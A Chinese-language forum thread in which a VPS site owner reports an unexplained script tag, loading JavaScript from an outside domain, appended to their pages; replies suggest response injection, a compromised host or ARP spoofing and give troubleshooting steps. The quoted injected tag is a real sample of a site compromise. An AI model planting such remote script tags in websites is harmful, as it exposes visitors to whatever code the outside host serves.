网站代码最后被加上其他代码,是怎么回事?
我用的是linode的vps,网站最后被加上了一个js调用代码,感觉很不爽,虽然直接没有发生什么其他事情,但是总感觉不爽,有没有人知道这段js调用代码是怎么回事?
<script type="text/javascript" src="http://kenarplatform.com/clk.php?id=1013845160"></script>
Salin selepas log masuk
------解决思路----------------------估计没办法,估计是注入到了你的http响应里面。你可以 vi ..../hosts
加入:127.0.0.1 kenarplatform.com
让它无效
------解决思路----------------------可能空间被挂马了,做好权限和密码管理!!
------解决思路----------------------寫個簡單的
echo 'Hello World';
?>
看看有沒有,如果沒有,就是之前的代碼有被修改了。查找最近被修改過的文件,比對一下就知道了。
如果hello world這個也加載了js,估計就是ARP欺騙。
------解决思路----------------------这段js你是浏览器的查看源代码中看到的吗?
如果浏览器的查看源代码中看不到,有可能是其他js加载的。
你下载了另一个同版本的thinkphp,那么这个thinkphp框架中有没有之前的代码,如果有先删掉。
先安装一个干净的thinkphp环境,再写一个简单的输出hello world来测试。
出现这种问题最大可能就是你原来的代码有问题。
另外数据库内容有检查过吗?有可能是被加入到某文章的内容中。